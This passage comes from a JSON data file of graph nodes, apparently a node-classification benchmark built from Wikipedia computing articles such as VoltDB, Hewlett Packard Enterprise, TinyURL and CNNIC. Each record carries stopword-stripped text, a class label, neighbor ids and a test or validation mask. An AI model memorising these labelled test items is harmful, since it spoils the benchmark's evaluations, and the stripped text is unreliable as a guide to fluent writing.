    "text": "VoltDB:voltdb voltdb in-memory database designed michael stonebraker earlier designed ingres postgresql sam madden daniel abadi acid-compliant rdbms uses shared nothing architecture includes enterprise community editions community edition licensed gnu affero general public license voltdb newsql relational database supports sql access within pre-compiled java stored procedures unit transaction stored procedure written java interspersed sql voltdb relies horizontal partitioning individual hardware thread scale k-safety synchronous replication provide high availability combination continuous snapshots command logging durability crash recovery voltdb based h-store uses shared-nothing architecture scale data processing associated distributed across cpu cores within servers composing single voltdb cluster extending shared-nothing foundation per-core level voltdb scales increasing core-per-cpu counts multi-core servers making stored procedures unit transaction executing partition containing necessary data possible eliminate round trip messaging sql statements stored procedures executed serially completion single thread without locking latching similar lmax architecture data memory local partition stored procedure execute microseconds voltdb stored procedure initiation scheme allows nodes initiate stored procedures avoiding single serializable global order voltdb acid compliant data written durable storage durability ensured continuous snapshots asynchronous command logging creates snapshots log transactions snapshots synchronous command logging logs transactions transaction completes committed database ensures transactions committed logged transactions lost applications must designed data altered single stored procedure stored partition voltdb v5.0 introduced database monitoring management tool voltdb management center vmc short vmc provides browser-based one-stop monitoring configuration management voltdb database including graphs cluster throughput latency well cpu memory usage current server voltdb version 5.1 released march 2015 introduce database replication functionality removing single point failure dr provides simultaneous parallel replication multiple partitions binary logs transaction results saving replica replay transaction",
    "neighbors": [
      10048,
      2051,
      9286,
      6124,
      4781,
      5677,
      7983,
      10286,
      4817,
      10413,
      3219,
      10389,
      823,
      4696,
      9177,
      8539,
      6780,
      7581
    ],
    "mask": "Test"
  },
  {
    "node_id": 1637,
    "label": 2,
    "text": "Hw.sensors:hw.sensors sysctl hw.sensors framework kernel-level hardware sensors framework originating openbsd uses sysctl kernel interface transport layer kernel userland framework used hundred device drivers openbsd export various environmental sensors temperature sensors common type consumption monitoring sensors done userland help sysctl systat sensorsd ntpd snmpd ports/sysutils/symon gkrellm openbsd framework integrated dell esm ipmi i²c addition number popular super i/o chips major difference compared solutions like lm_sensors simplicity works-by-default approach drivers n't require support configurability installation configuration actions required system administrator order get sensors going coupled fine-tuned ad-hoc read-only scan procedure i²c bus written theo de raadt centralised way cache making possible leave enabled default times unlike competing solutions support automatic monitoring raid drives also provided sensors framework concept sensors codice_1 type backported netbsd back envsys openntpd uses sensors type codice_3 order synchronise time provided nmea drivers framework originally devised 2003 alexander yurchenko porting several envsys-based drivers netbsd instead porting netbsd envsys simpler sysctl-based mechanism developed framework received major uptick usage device drivers release openbsd 3.9 period merely 6 months number individual drivers using framework went 9 openbsd 3.8 released 33 openbsd 3.9 released framework used 44 devices drivers time patchset committed converting simple one-level addressing scheme stable multi-layer addressing 2007 framework ported freebsd part google summer code grant adopted dragonfly bsd later year usability sensors monitoring daemon vastly improved 2007 partly due gsoc grant total number drivers stood 68 openbsd 4.4 growing 7 drivers 6-month release cycle level growth one new driver per month average common throughout history framework since openbsd 3.9 values exported drivers framework read-only however external patch exists implements fan control functionality framework well one drivers popular family super i/o chips patchset provided openbsd dragonfly bsd",
    "neighbors": [
      1273,
      9223,
      10631,
      1801,
      2825,
      3465,
      1932,
      10000,
      2193,
      274,
      788,
      7702,
      10105,
      10016,
      9762,
      6438,
      8998,
      6702,
      1071,
      7983,
      9009,
      9520,
      11698,
      3133,
      2245,
      1993,
      8778,
      3404,
      8909,
      5710,
      11086,
      850,
      5970,
      8410,
      4571,
      5084,
      7521,
      8546,
      1891,
      7139,
      7907,
      4071,
      11623,
      1515,
      5230,
      2415,
      2545,
      5363,
      10102,
      1400,
      1785,
      8954,
      2045,
      6014
    ],
    "mask": "Test"
  },
  {
    "node_id": 1638,
    "label": 7,
    "text": "Hewlett_Packard_Enterprise:hewlett packard enterprise hewlett packard enterprise company commonly referred hpe american multinational enterprise information technology company based san jose california founded 1 november 2015 part splitting hewlett-packard company hpe business-focused organization two divisions enterprise group works servers storage networking consulting support financial services 4 december hpe reported fy2018 net revenue 30.9 billion 7 prior year period split structured former hewlett-packard company would change name hp inc. spin hewlett packard enterprise newly created company hp inc. retained old hp personal computer printing business well stock-price history original nyse ticker symbol hewlett-packard enterprise trades ticker symbol hpe according notes 2015 hpe revenue slightly less hp inc 2017 spun enterprise services business merged computer sciences corporation become dxc technology also spun software business merged micro focus hpe ranked 107 2018 fortune 500 list largest united states corporations total revenue full name company hewlett packard enterprise company drops hyphen previously existed hewlett packard former hewlett-packard company since separation many media outlets incorrectly named new organization using hp enterprises hp enterprise may 2016 company announced would sell enterprise services division one competitors computer sciences corporation deal valued merger hpe enterprise services csc form new company dxc technology completed 10 march 2017 approximately 100,000 current hpe employees affected 30,000 services employees areas hpe business remain hpe including technology services support consulting well software professional services august 2016 company announced plans acquire silicon graphics international sgi known capabilities high performance computing 1 november 2016 hpe announced completed acquisition per share cash transaction valued approximately net cash debt 7 september 2016 hpe announced spin-merge micro focus micro focus would acquire non-core software hpe shareholders would 50.1 percent merged company would retain current name merger concluded 1 september 2017 november 2016 pc world wrote hpe hewlett-packard failed develop middleware tools really make dent software market companies like ibm sap oracle excelling without major software product lines hpe ’ integrated offerings ’ strong competitors like dell software hardware assets adding hpe point focusing largely hardware ask end game september 2016 hewlett packard enterprise transferred two patents texas-based wholly owned shell company plectrum llc two patents originated 3com corporation bought hp 2010 along 1,400 patents us patent entitled quality service control mechanism apparatus us patent describes use high speed cache management unit replaces software-based systems hardware order reduce latency time 11 april 2017 reported synack raised round funding included hewlett packard enterprise january 2017 company acquired data management platform simplivity developer omnicube hyper-converged infrastructure appliance us 650m april 2017 hewlett packard enterprise completed acquisition hybrid flash flash manufacturer nimble storage inc per share october reuters reported company allowed russian defense agency examine cyber-defense system used pentagon report noted six former u.s. intelligence officials well former arcsight hewlett packard enterprise employees independent security experts said source code review could help moscow discover weaknesses software potentially helping attackers blind u.s. military cyber attack november 2017 meg whitman announced stepping ceo six years helm hp hpe noted 1 february 2018 antonio neri officially became hpe ’ president chief executive officer announcement created controversy leading 6 drop stock price quickly recovered next days june 2018 hewlett packard enterprise launched hybrid cloud service called greenlake hybrid cloud built top hpe onesphere cloud management saas offering greenlake hybrid cloud designed provide cloud management cost control compliance control capabilities run aws microsoft azure february 2019 meg whitman announced seeking re-election board directors ending professional involvement hpe may 2019 hewlett packard enterprise announced plans acquire cray nearly per share soon cray landed us department energy contract supply frontier supercomputer oak ridge national laboratory 2021",
    "neighbors": [
      9863,
      2184,
      5384,
      6153,
      7432,
      3214,
      1935,
      3343,
      8975,
      5523,
      8212,
      1304,
      4761,
      5272,
      10265,
      1823,
      9248,
      8355,
      8229,
      424,
      10797,
      2224,
      9137,
      6834,
      9782,
      10303,
      5571,
      1606,
      9031,
      11465,
      6858,
      7243,
      11213,
      7248,
      3281,
      1874,
      2258,
      9424,
      982,
      7257,
      5210,
      10713,
      4444,
      11100,
      10590,
      9569,
      4194,
      6765,
      5999,
      5232,
      9455,
      11505,
      6003,
      9080,
      10615,
      1400,
      3323,
      5756
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1639,
    "label": 4,
    "text": "United_States_Air_Force_Office_of_Special_Investigations:united states air force office special investigations u.s. air force office special investigations afosi osi u.s. federal law enforcement agency reports directly secretary air force afosi also u.s. air force field operating agency administrative guidance oversight inspector general air force federal statute afosi provides independent criminal investigative counterintelligence protective service operations worldwide outside traditional military chain command afosi proactively identifies investigates neutralizes serious criminal terrorist espionage threats personnel resources air force u.s. department defense thereby protecting national security united states afosi founded august 1 1948 suggestion congress consolidate investigative activities air force secretary air force w. stuart symington created afosi patterned federal bureau investigation fbi appointed special agent joseph f. carroll senior fbi official assistant fbi director j. edgar hoover first commander afosi charged providing independent unbiased centrally directed investigations criminal activity air force carroll later became first director defense intelligence agency 2007 afosi 2,900 employees pilot training afosi remains second-most requested career choice air force officers afosi capabilities afosi cornerstone vigorously solve crime protect secrets warn threats exploit intelligence opportunities operate cyber afosi investigates wide variety serious offenses espionage terrorism crimes property violence people larceny computer hacking acquisition fraud drug use distribution financial misdeeds military desertion corruption contracting process illegal activity undermines mission air force dod afosi military investigative service designated law enforcement agency created 1948 1976 afosi reservist noted discrepancy called attention command afosi quickly sought received official recognition designation official law enforcement agency addition afosi headquarters quantico va afosi eight field investigations regions seven regions aligned air force major commands addition afosi several specialized investigative training supporting units regions serve investigative needs aligned major commands afosi units personnel remain independent commands afosi chains command region directly afosi headquarters organizational independence intended ensure unbiased investigations single region aligned major command region 7 mission provide counterintelligence security-program management special access programs office secretary air force regional level subordinate units called field investigations squadrons detachments operating locations 255 afosi units worldwide including jordan saudi arabia yemen iraq afghanistan middle east locations threat detection afosi manages offensive defensive activities detect counter destroy effectiveness hostile intelligence services terrorist groups target air force efforts include investigating crimes espionage terrorism technology transfer computer infiltration mission aspect also includes providing personal protection senior air force leaders officials well supervising extensive antiterrorism program geographic areas heightened terrorist activity criminal investigations vast majority afosi investigative activities pertain felony crimes including murder robbery rape assault major burglaries drug use trafficking sex offenses arson black market activities serious criminal activities january 2014 investigating synthetic drugs abuse afosi uncovered facts cheating monthly proficiency exams 341st missile wing malmstrom air force base montana involving 79 officers economic crime investigations significant amount afosi investigative resources assigned fraud economic crime investigations include violations public trust involving air force contracting matters appropriated nonappropriated funds activities computer systems pay allowance matters environmental matters acquiring disposing air force property major administrative irregularities afosi uses fraud surveys determine existence location extent fraud air force operations programs also provides briefings base command-level resource managers help identify prevent fraud involving air force department defense dod resources information operations air force countering global security threat information systems afosi role support information operations recognizes future threats air force response threats occur cyberspace afosi support information operations comes many forms afosi computer crime investigators provide rapid worldwide response intrusions air force systems technology protection desires potential adversaries acquire mimic technological advances air force heightened need protect critical air force technologies collateral data afosi research technology protection program provides focused comprehensive counterintelligence core mission investigative services safeguard air force technologies programs critical program information personnel facilities specialized services afosi numerous specialists invaluable successful resolution investigations include technical specialists polygraphers behavioral scientists computer experts forensic advisers defense cyber crime center department defense cyber crime center dc3 established organic entity within afosi 1998 formation dc3 expanded operational scope afosi computer forensic lab established 1995 first kind within dod dc3 provides digital multimedia forensics cyber investigative training research development test evaluation cyber analytics following dod mission areas information assurance critical infrastructure protection law enforcement counterintelligence document media exploitation counterterrorism dc3 national cyber center serves operational focal point defense industrial base cybersecurity information assurance program dib cs/ia program new afosi special agent recruits—whether officer enlisted civilian—receive entry-level training federal law enforcement training center fletc glynco georgia training requires recruit meet various physical requirements candidates attend 12-week criminal investigator training program federal law enforcement trainees course followed eight weeks afosi agency-specific coursework u.s. air force special investigations academy usafsia co-located fletc courses offer new agents training firearms weapons defensive tactics forensics surveillance surveillance detection antiterrorism techniques crime scene processing interrogations interviews court testimony military federal law upon graduation new afosi special agents spend one-year probationary period field upon successful completion agents receive specialized training economic crime antiterrorism service counterintelligence computer crimes sophisticated criminal investigative capabilities others attend 12 weeks technical training acquire electronic photographic skills required perform technical surveillance countermeasures experienced agents selected polygraph duties attend 14-week department defense course recruit expected participate following exercises flexibility bench press run/walk agility run students tested determine fitness level test age gender normed afosi special agents expected remain physically fit throughout employment must maintain air force physical fitness standards defined air force instruction afi 36-2905 afosi agents primary firearm 9×19mm sig sauer p228 though weapons available use depending needs mission including m4 mp5 agents may also qualify weapon approved list manufacturers 9mm december 2013 colorado springs gazette reported afosi operating confidential informant program u.s. air force academy usafa colorado springs co recruited cadets gather information rule breakers criminals program left recruits take responsibility initial incident got trouble subsequent rule-breaking behavior resulting directions afosi agents one cadets participated said ... effective got 15 convictions drugs two convictions sexual assault making difference motivating especially sexual assaults could see victims sense peace response usafa superintendent oversight program academy though superintendent aware operations afosi still command control program 2017 former airman devin kelley shot killed 26 people wounded 22 others first baptist church sutherland springs tx according media department defense inspector general report kelly convicted assault discharged air force information supposed reported afosi fbi criminal justice information services division occurred kelley would unable purchase firearm legally federal firearms license ffl afosi failed send data four times according secaf failure reporting kelley criminal history isolated event unique case holloman afb nm investigation unfolded. ” military criminal investigative organizations air force",
    "neighbors": [
      5153,
      1639,
      4945,
      10290,
      10545,
      8632
    ],
    "mask": "None"
  },
  {
    "node_id": 1640,
    "label": 4,
    "text": "Misuse_detection:misuse detection misuse detection actively works potential insider threats vulnerable computer data misuse detection approach detecting computer attacks misuse detection approach abnormal system behaviour defined first behaviour defined normal stands anomaly detection approach utilizes reverse defining normal system behaviour first defining behaviour abnormal misuse detection anything known normal example misuse detection use attack signatures intrusion detection system misuse detection also used generally refer kinds computer misuse theory misuse detection assumes abnormal behaviour simple-to-define model advantage simplicity adding known attacks model disadvantage inability recognize unknown attacks information misuse detection including papers written subject consider following",
    "neighbors": [
      11330,
      612,
      5636,
      5722,
      5245
    ],
    "mask": "Test"
  },
  {
    "node_id": 1641,
    "label": 9,
    "text": "Charles_Leonard_Hamblin:charles leonard hamblin charles leonard hamblin 1922 – 14 may 1985 australian philosopher logician computer pioneer well professor philosophy new south wales university technology university new south wales sydney among well-known achievements area computer science introduction reverse polish notation use 1957 push-down pop-up stack preceded work friedrich ludwig bauer klaus samelson use push-pop stack stack invented alan turing 1946 introduced stack design ace computer hamblin well-known contribution philosophy book fallacies standard work area false conclusions logic interrupted second world war radar service australian air force hamblin studies included mathematics physics philosophy university melbourne obtained doctorate 1957 london school economics 1955 lecturer n.s.w university technology later professor philosophy place death 1985 time organization renamed university new south wales second half 1950s hamblin worked third computer available australia deuce computer manufactured english electric company deuce designed one first programming languages later called george based reverse polish notation associated compiler language translator translated programs formulated george machine language computer 1957 hamblin work considered first use reverse polish notation called inventor representation method regardless whether hamblin independently invented notation usage showed merit service advantage reverse polish way writing programs processing programmable computers algorithms make happen second direct result work development compilers concept push-pop stack previously invented alan m. turing ace 1945 hamblin developed independently friedrich ludwig bauer klaus samelson year 1957 hamblin presented stack concept first australian computer conference compiler running conference hamblin work influenced development stack-based computers machine instructions arguments stack reference addresses design taken english electric kdf9 computer delivered 1963 1960s hamblin increasingly turned philosophical questions wrote influential introductory book formal logic today standard work fallacies focused upon treatment false conclusions traditional logic brought treatment formal dialectic developed hamblin considered one founders modern informal logic hamblin contributed development modern temporal logic two ways early period corresponded arthur prior 1958 1965 collaboration culminated so-called hamblin implications later 1972 hamblin independently rediscovered form duration calculus interval logic without aware 1947 work a. g. walker topic interested tense aspect hamblin duration calculus similar later developed james allen patrick j. hayes mid 1980s addition ancient greek hamblin familiar several asian pacific languages classical music lover played piano hamblin setting words wittgenstein music hospitalized affliction proved fatal married rita hamblin two daughters fiona katherine julie claire",
    "neighbors": [
      1392,
      5496,
      5248
    ],
    "mask": "None"
  },
  {
    "node_id": 1642,
    "label": 9,
    "text": "Puffin_Browser:puffin browser puffin browser web browser developed cloudmosa american-based mobile technology company founded shioupyn shen puffin browser initially released 2010 utilizes encrypted cloud servers content processing puffin renders webpages cloud could according benchmark tests make page loading content rendering javascript execution faster local device processing however result web pages processed cloud servers user ip address browsing world wide web puffin web browser reflects cloud server ip address causes websites detect puffin browser proxy server puffin browser comes adobe flash player play adobe flash content including mobile devices flash discontinued due security issues features also include virtual trackpad gamepad on-screen keyboard functions cloudmosa comprehensive product family puffin products run many different platforms puffin browser android puffin secure browser windows macos puffin internet terminal linux puffin tv browser smart tv puffin os main stream smart phones also known run resource-limited hardware like raspberry pi set-top box tv stick etc may 2019 cloudmosa announced discontinuing puffin web browser app ios devices due apple app store policies puffin browser released paid version puffin web browser pro google play december 2010 apple app store november 2010 2013 cloudmosa introduced puffin academy free mobile browser built-in adobe flash k-12 students teachers parents however ios version puffin academy discontinued ios platform july 1 2019 2015 cloudmosa released new product puffin facebook 2017 puffin browser top utility application app store across 58 countries including france united kingdom japan italy south korea besides puffin web browser pro puffin browser also ad-supported lite version ad blocking features added pro version exist lite version puffin tv special edition puffin browser optimized android google play tv users ranked best browser android tv makeuseof thailand largest gsm mobile phone operator advanced info service ais ships customized puffin tv browser set-top box—ais playbox 2018 puffin browser product family available mobile devices starting 2018 puffin browser released desktop version puffin secure browser windows may 2019 puffin secure browser mac os released october 24 2018 puffin browser reached 50 million users android november 2018 puffin browser reached 100 million accumulated users worldwide ios+android right opening ces 2019 cloudmosa announced new puffin browser product family member—puffin internet terminal desktop virtualization app running raspbian internet surfing designed raspberry pi puffin internet terminal selected ces 2019 innovation awards honoree computer hardware components product category may 2019 puffin browser introduced new family member—puffin os additionally cloudmosa announced discontinuing puffin web browser apps july 1 2019 ios devices cloudmosa reason discontinuing app app updated past two years met apple app store policies puffin web browser standard puffin browser application android puffin web browser includes support adobe flash content features mouse cursor emulation virtual gamepad users able choose save downloaded file either users devices directly storage drive web browser also allows users reduce amount data used sources flash games often consume lot data",
    "neighbors": [
      513,
      6657,
      9736,
      2579,
      6171,
      9757,
      7713,
      10791,
      9770,
      559,
      4661,
      3639,
      10808,
      3643,
      9275,
      64,
      5707,
      10834,
      6231,
      8281,
      6747,
      9834,
      9841,
      115,
      9843,
      4725,
      119,
      4728,
      637,
      1664,
      2182,
      10910,
      8351,
      7340,
      9394,
      9908,
      185,
      11449,
      4797,
      11466,
      7885,
      11469,
      9424,
      4310,
      2777,
      8923,
      737,
      4326,
      8443,
      9987,
      7943,
      278,
      7965,
      1834,
      7983,
      1849,
      10057,
      11082,
      2893,
      8557,
      6528,
      3971,
      3462,
      8584,
      7572,
      5536,
      5026,
      944,
      5054,
      6086,
      4048,
      5078,
      479,
      10722,
      5605,
      487,
      8169,
      494,
      1520,
      7152,
      6133,
      5622,
      5114
    ],
    "mask": "Test"
  },
  {
    "node_id": 1643,
    "label": 8,
    "text": "TinyURL:tinyurl tinyurl url shortening web service provides short aliases redirection long urls kevin gilbertson web developer launched service january 2002 way post links newsgroup postings frequently long cumbersome addresses tinyurl homepage includes form used submit long url shortening url entered server adds new alias hashed database returns short url tinyurl offers api allows applications automatically create short urls done simply reading result returned codice_1 short url aliases seen useful easier written remembered distributed also fit text boxes limited number characters allowed examples limited text boxes irc channel topics email signatures microblogs certain printed newspapers .net magazine even nature email clients impose line breaks messages certain length starting 2008 tinyurl allowed users create custom meaningful aliases means user create descriptive urls rather randomly generated address example codice_2 leads wikipedia article website ability preview full url present tinyurl user previously enabled previews visits url preview.tinyurl.com place tinyurl.com site display target url hyperlink instead redirecting automatically feature well documented tinyurl site alternative shortened url preview capability offered option time creation popularity tinyurls influenced creation least 100 similar websites simply domain alternatives offer additional features people posting twitter often made extensive use shortened urls keep tweets within service-imposed 140 character limit twitter used tinyurl 2009 switching bit.ly twitter uses t.co domain purpose though twitter extended limit 280 characters automatically shortens links longer 31 characters using t.co domain tinyurl method allocating shorter web addresses inspired action known tinyurl-whacking random letters numbers placed first forward slash attempt hit interesting sites without knowing",
    "neighbors": [
      5251,
      7370,
      5012,
      7861,
      10390,
      735
    ],
    "mask": "Test"
  },
  {
    "node_id": 1644,
    "label": 5,
    "text": "X-Video_Motion_Compensation:x-video motion compensation x-video motion compensation xvmc extension x video extension xv x window system xvmc api allows video programs offload portions video decoding process gpu video-hardware theory process also reduce bus bandwidth requirements currently supported portions offloaded xvmc onto gpu motion compensation mo comp inverse discrete cosine transform idct mpeg-2 video xvmc also supports offloading decoding mo comp idct vld variable-length decoding commonly known slice level acceleration mpeg-2 also mpeg-4 asp video via unichrome s3 graphics chrome series hardware xvmc first unix equivalent microsoft windows directx video acceleration dxva api popular software applications known take advantage xvmc include mplayer mythtv xine hardware video gpu capable xvmc video acceleration requires x11 software device driver enable features currently three x11 nvidia drivers available 2d-only open source obfuscated driver maintained nvidia called nv proprietary binary driver nvidia open source driver based reverse engineering binary driver developed linux community called nouveau nouveau pursuing xvmc support 2d nv driver support xvmc official proprietary binary driver nvidia supports mpeg-2 offloading mo comp idct hardware including geforce 7000 series via provides open source device drivers via unichrome s3 graphics chrome series hardware supporting offloading mpeg-2 mpeg-4 asp video thanks vld level decoding via offloads much decoding tasks cpu gpus supporting idct mo comp levels keep mind devices supported caveats intel provides official open source device drivers supports mpeg-2 offloading mo comp idct intel 8xx/9xx range integrated graphics chips although ati first manufacturer provide mpeg2 acceleration graphic boards rage 128 gpu never provided documentation use xvmc available probably never xvmc supported radeon-4000 cards uvd catalyst driver 8.10 higher experimental level meaning n't work box see also x-video bitstream acceleration motion compensation support ati/amd hardware planned future hardware support mpeg-2 acceleration idct mo comp levels device drivers support xvmc matrox hardware although matrox parhelia hardware support mpeg-2 acceleration mo comp level binary device driver s3 supports mpeg-2 offloading initial 2.0.16 driver chrome 20 gpus x-video motion compensation api specification v. 1.0 xvmc extends x video extension xv makes use familiar concept xvport ports attributes set queried xv xvmc ports also hardware motion compensation contexts created use ports support xvimages i.e xv_image port encoding described xv version 2.2 api addendum queried list xvmcsurface types support support xvmcsurface types xvmccontext created port xvmccontext describes state motion compensation pipeline individual xvmccontext created use single port surface type motion compensation type width height combination example context might created particular port mpeg-2 motion compensation 720 x 480 4:2:0 surfaces context created referencing implies port surface type size motion compensation type contexts may direct indirect indirect contexts x display server renders video using data passed client direct contexts client libraries render video little interaction x display server xvmcsurfaces buffers motion compensation hardware render data buffers client accessible may stored hardware-specific format number buffers created use particular context resources permitting xvmc provides video acceleration starting one two places video pipeline acceleration starting first point shall call motion compensation level begins inverse quantization idct place motion compensation applied second point shall call idct level begins idct inverse quantization rendering done presenting library target xvmcsurface two reference xvmcsurfaces motion compensation buffer 8x8 blocks command buffer describes use 8x8 blocks along motion compensation vectors construct data target xvmcsurface pipeline starts idct level xv perform idct blocks performing motion compensation function provided copy/overlay portion xvmcsurface drawable arbitrary scaling xvmcsubpictures separate surfaces may blended target surface number xvmcsubpictures may created use context resources permitting backend frontend subpicture behavior supported xvmc acceleration supported even though xvmc currently supports hardware acceleration motion compensation mo comp inverse discrete cosine transform idct variable-length decoding via unichrome gpu additional video decoding processes could passed modern gpus could accelerated via gpu fragment programs xvmc could extended future support processes newer competing hardware video acceleration apis like vdpau xvba vaapi besides matching features function dxva microsoft equivalent api windows lacking support video formats mpeg-2 linux device drivers intel nvidia xvmc api specification version 1.0 currently also limitations project called va api underway develop modern video acceleration api support video acceleration features modern gpus xvideo",
    "neighbors": [
      1377,
      10658,
      8995,
      9223,
      1770,
      5867,
      8682,
      429,
      6797,
      7309,
      3764,
      2581,
      8438,
      11322,
      11485
    ],
    "mask": "Test"
  },
  {
    "node_id": 1645,
    "label": 4,
    "text": "World_Informatix_Cyber_Security:world informatix cyber security world informatix cyber security organisation focusing cyber security aspect developing countries company caught attention handling high profile case bangladesh bank robbery organisation assisted advised bank make remediation measures post breach later case investigated fireeye primary focus organisation work society worldwide interbank financial telecommunication aka swift part customer security platform perform incident response case security breaches",
    "neighbors": [
      5563
    ],
    "mask": "None"
  },
  {
    "node_id": 1646,
    "label": 6,
    "text": "Libzip:libzip libzip open source library handling zip archives written portable c thus used multiple operating systems based zlib used php zip extension zip file support mysql workbench also used kde ark archiving tool zip archive support libzip supports reading writing zip archives particular allows extracting single multiple files querying attributes including extra fields comments writing allows replacing files adding new ones data come buffers files even zip archives without recompression extra field data comments file archive added modified deleted changes finalized closing archive on-disk archive always self-consistent zip64 extension large files also supported version 1.2.0 added support encryption decryption using aes version 1.3.0 added support compression using bzip2 opening existing archives strict consistency check requested libzip written c used c++ since version 1.1 libzip contains ziptool tool modifying zip archives command line",
    "neighbors": [
      3969,
      6022,
      10121,
      1420,
      1940,
      3222,
      9880,
      546,
      3114,
      10027,
      7983,
      2864,
      6713,
      2755,
      8644,
      11076,
      1352,
      4296,
      1101,
      8909,
      10317,
      10575,
      4561,
      722,
      8147,
      10971,
      11614,
      3296,
      9953,
      5858,
      10851,
      6759,
      9320,
      7529,
      4459,
      5612,
      237,
      7667,
      2804,
      6389,
      10739,
      4089,
      2810,
      2045,
      894,
      10623
    ],
    "mask": "Test"
  },
  {
    "node_id": 1647,
    "label": 4,
    "text": "PathPing:pathping codice_1 command command-line network utility supplied windows 2000 beyond combines functionality ping tracert used locate spots network latency network loss command provides details path two hosts ping-like statistics node path based samples taken time period depending many nodes start end host advantages codice_1 codice_3 codice_4 node pinged result single command behavior nodes studied extended time period rather default ping sample four messages default traceroute single route trace disadvantage takes total 25 seconds per hop show ping statistics command-syntax options pathping wikipedia.org -q 10",
    "neighbors": [
      3970,
      8834,
      10631,
      2568,
      6281,
      6797,
      3856,
      6674,
      4248,
      8729,
      4001,
      7329,
      4771,
      7847,
      808,
      3755,
      7983,
      7088,
      10033,
      9780,
      1978,
      7356,
      5437,
      7486,
      10428,
      960,
      8517,
      1741,
      4174,
      1750,
      9946,
      10727,
      6506,
      9709,
      9839,
      2545,
      4850,
      7411,
      8692,
      11249,
      6396
    ],
    "mask": "Test"
  },
  {
    "node_id": 1648,
    "label": 2,
    "text": "Uniform_Driver_Interface:uniform driver interface uniform driver interface udi defunct project developed several companies define portable interface device drivers uniform driver interface udi allowed device drivers portable across hardware platforms operating systems without changes driver source participation multiple os platform device hardware vendors udi intended first interface likely achieve portability wide scale udi provided encapsulating environment drivers well-defined interfaces isolated drivers os policies platform i/o bus dependencies principle allowed driver development totally independent os development addition udi architecture intended insulate drivers platform specifics byte-ordering dma implications multi-processing interrupt implementations i/o bus topologies udi could potentially benefit open source operating systems linux *bsd providing driver support companies open source/free software advocates feared udi would cause proliferation closed source drivers reduction open source support companies undermining purpose free software open source movements richard stallman leader free software movement claimed project benefit free software movement",
    "neighbors": [
      6082,
      7983,
      823,
      2424,
      10079
    ],
    "mask": "None"
  },
  {
    "node_id": 1649,
    "label": 0,
    "text": "Filtered-popping_recursive_transition_network:filtered-popping recursive transition network filtered-popping recursive transition network fprtn simply filtered-popping network fpn recursive transition network rtn extended map states keys returning subroutine jump requires acceptor return states mapped key rtns finite-state machines seen finite-state automata extended stack return states well consuming transitions formula_1-transitions rtns may define call transitions transitions perform subroutine jump pushing transition target state onto stack bringing machine called state time acceptor state reached return state top stack popped provided stack empty machine brought state throughout article refer filtered-popping recursive transition networks fpns though acronym ambiguous e.g fuzzy petri nets filtered-popping networks fprtns unambiguous alternatives fpn structure formula_2 transitions represent possibility bringing fpn source state formula_11 target state formula_12 possibly performing additional action depending action distinguish following types explicitly -defined transitions behaviour call transitions governed two kinds implicitly -defined transitions push transitions initialize subroutine jumps pop transitions equivalent return statements natural language text enriched meta-information application rtn output instance rtn inserting xml tags used transforming plain text structured xml document rtn output representing natural language grammar would delimit add syntactic structure text sentence see parsing rtns output could simply mark text segments containing relevant information see information extraction application rtn output representing ambiguous grammar results set possible translations interpretations input computing set exponential worst-case cost even earley parser rtns output due cases number translations increases exponentially w.r.t input length instance number interpretations natural language sentence increases exponentially w.r.t number unresolved prepositional phrase attachments fpns serve compact representation set translations allowing compute cubic time means earley-like parser fpn states correspond execution states see instruction steps earley-parser rtns without output fpn transitions correspond possible translations input symbols formula_30 map resulting fpn gives correspondence represented output segments recognized input segments given recognized input sequence formula_31 fpn path formula_32 starting state formula_33 ending state formula_34 formula_32 represents possible translation input segment formula_36 filtered-popping feature required order avoid fpn paths represent translations disconnected overlapping input segments fpn call may contain several translation paths called state acceptor state input segments correspond share start point necessarily length return states corresponding input point acceptor state finishing call valid return states",
    "neighbors": [
      5399,
      479
    ],
    "mask": "Test"
  },
  {
    "node_id": 1650,
    "label": 4,
    "text": "China_Internet_Network_Information_Center:china internet network information center china internet network information center cnnic administrative agency responsible internet affairs ministry industry information technology people republic china based zhongguancun high tech district beijing founded june 3 1997 government department disguise non-profit organization cnnic responsible operating administering china ’ domain name registry cnnic manages .cn country code top level domain chinese domain name system internationalized domain names contain chinese characters june 2015 total number chinese domain names 22,310,000 january 2009 cnnic opens cn domain registered businesses requires supporting documentations domain registration business license personal id suspended overseas registrars even domestic registrants cnnic denies mandates existing personal domain names transferred businesses trend micro suggests move still enough stop modern security threats .cn domain cnnic allocates internet protocol ip addresses numbers domestic isps users cnnic national internet registry nir acknowledged asia-pacific network information center apnic late 2004 cnnic launched “ ip allocation alliance ” simplified procedures obtaining ip addresses cnnic responsible creation maintenance state top-level network catalog database database provides information internet users web addresses domain names numbers cnnic conducts technical research undertakes state technical projects based administrative practical network technology experience cnnic conducted continues conduct surveys internet information resources cnnic maintains statistics topics internet bandwidth china domain name registrations internet development china national network information center nic cnnic maintains cooperative relationships international internet communities works closely nics countries cnnic serves secretariat internet society china ’ internet policy resource committee policy resource committee charge tasks providing policy legislation oriented suggestions promote growth china ’ internet facilitating development application internet resources relevant technologies actively participating research work domestic internet development administration policies july 2008 broad alliance chinese online commerce stakeholders including cnnic major chinese commercial banks web hosting companies founded anti-phishing alliance china apac order tackle phishing activities abuse .cn sub-domain names cnnic also functions secretariat apac october 2009 alliance announced cooperation two new members netcraft maxthon help alliance process verify various phishing reports add confirmed phishing urls netcraft phishing site feed maxthon phishing blacklist 2015 google discovered cnnic issued intermediate ca certificate egypt-based firm used cnnic keys impersonate google domains google responded removing cnnic root certificate certificate store google chrome google products mozilla responded incident stating mozilla ca team believes cnnic ’ actions amount egregious behaviour ... cnnic ’ decision violate certification practice statement especially serious raises concerns go beyond immediate scope misissued intermediate certificate public discussion ... planning change firefox ’ certificate validation code refuses trust certificate issued cnnic root notbefore date 1 april 2015",
    "neighbors": [
      1410,
      517,
      2057,
      2458,
      9117,
      8865,
      7078,
      7723,
      1969,
      2994,
      10417,
      1083,
      10303,
      7490,
      2504,
      2901,
      3168,
      225,
      5472,
      6000,
      2802,
      8310,
      119,
      127
    ],
    "mask": "Test"
  },
  {
    "node_id": 1651,
    "label": 3,
    "text": "Socket_563:socket 563 socket 563 micropga cpu socket used exclusively low-power 16 w 25 w tdp athlon xp-m processors models 8 10 socket usually found laptops requires low-power mobile part special 563-pin µpga package different socket 462 pin package used athlon processors desktop computer motherboards equipped socket 563 pcchips known marketed board m863g ver3 actually made ecs bundled socket 563 processor heatsink",
    "neighbors": [
      3586,
      9475,
      3588,
      8452,
      3464,
      4872,
      7058,
      10260,
      4246,
      4767,
      2463,
      7712,
      9122,
      1322,
      11183,
      1329,
      3892,
      8629,
      9400,
      6978,
